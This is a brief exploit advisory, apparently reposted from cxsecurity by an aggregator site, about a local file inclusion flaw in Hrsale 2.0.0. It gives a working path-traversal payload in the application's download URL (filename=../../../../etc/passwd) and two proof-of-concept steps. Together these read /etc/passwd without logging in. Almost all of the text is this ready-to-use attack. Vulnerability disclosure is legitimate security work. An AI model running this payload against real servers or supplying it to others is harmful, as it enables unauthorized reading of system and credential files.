Hrsale 2.0.0 Local File Inclusion
2020-10-22 02:18:50 Author: cxsecurity.com(查看原文) 阅读量:193 收藏

# Exploit Title: Hrsale 2.0.0 - Local File Inclusion # Date: 10/21/2020 # Exploit Author: Sosecure # Vendor Homepage: https://hrsale.com/index.php # Version: version 2.0.0 Description: This exploit allow you to download any readable file from server with out permission and login session. Payload : https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd POC: 1. Access to HRsale application and browse to download path with payload 2. Get /etc/passwd


文章来源: https://cxsecurity.com/issue/WLB-2020100137
如有侵权请联系:admin#unsafe.sh